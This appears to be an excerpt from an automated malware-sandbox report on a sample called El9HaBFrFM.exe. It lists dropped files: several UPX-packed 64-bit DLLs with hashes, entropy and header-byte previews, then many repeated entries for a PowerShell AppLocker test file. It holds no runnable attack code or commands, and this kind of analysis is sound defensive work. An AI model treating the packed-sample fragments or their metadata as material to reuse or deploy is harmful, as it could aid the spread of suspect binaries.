                                                                                                                                                                                                                                                                                                                      MD5:FB70AECE725218D4CBA9BA9BBB779CCC
                                                                                                                                                                                                                                                                                                                      SHA1:BB251C1756E5BF228C7B60DAEA1E3B6E3F9F0FF5
                                                                                                                                                                                                                                                                                                                      SHA-256:9D440A1B8A6A43CFAA83B9BC5C66A9A341893A285E02D25A36C4781F289C8617
                                                                                                                                                                                                                                                                                                                      SHA-512:63E6DB638911966A86F423DA8E539FC4AB7EB7B3FB76C30C16C582CE550F922AD78D1A77FA0605CAFFA524E480969659BF98176F19D5EFFD1FC143B1B13BBAAF
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):659216
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.993010988331354
                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:ZI2xdk6g1SJU1uQWhSskWXgN/YeZE21RUMza8WznRGO+4:ZbxYw+AXSskaSweZ91uMu80x+4
                                                                                                                                                                                                                                                                                                                      MD5:21AEA45D065ECFA10AB8232F15AC78CF
                                                                                                                                                                                                                                                                                                                      SHA1:6A754EB690FF3C7648DAE32E323B3B9589A07AF2
                                                                                                                                                                                                                                                                                                                      SHA-256:A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7
                                                                                                                                                                                                                                                                                                                      SHA-512:D5C9DC37B509A3EAFA1E7E6D78A4C1E12B5925B5340B09BEE06C174D967977264C9EB45F146ABED1B1FC8AA7C48F1E0D70D25786ED46849F5E7CC1C5D07AC536
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).....0......`.....................................................`..............................................#..........................................................................p...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):267024
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.9826656358602595
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:5FHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khE7xj:5tJlyHwqSBqpNsKUuntFJhMF9HC8jj
                                                                                                                                                                                                                                                                                                                      MD5:B2712B0DD79A9DAFE60AA80265AA24C3
                                                                                                                                                                                                                                                                                                                      SHA1:347E5AD4629AF4884959258E3893FDE92EB3C97E
                                                                                                                                                                                                                                                                                                                      SHA-256:B271BD656E045C1D130F171980ED34032AC7A281B8B5B6AC88E57DCE12E7727A
                                                                                                                                                                                                                                                                                                                      SHA-512:4DC7BD1C148A470A3B17FA0B936E3F5F68429D83D552F80051B0B88818AA88EFC3FE41A2342713B7F0F2D701A080FB9D8AC4FF9BE5782A6A0E81BD759F030922
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).........0..P....@...................................0............`..........................................+..X....)....... .......................+..$...................................P...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
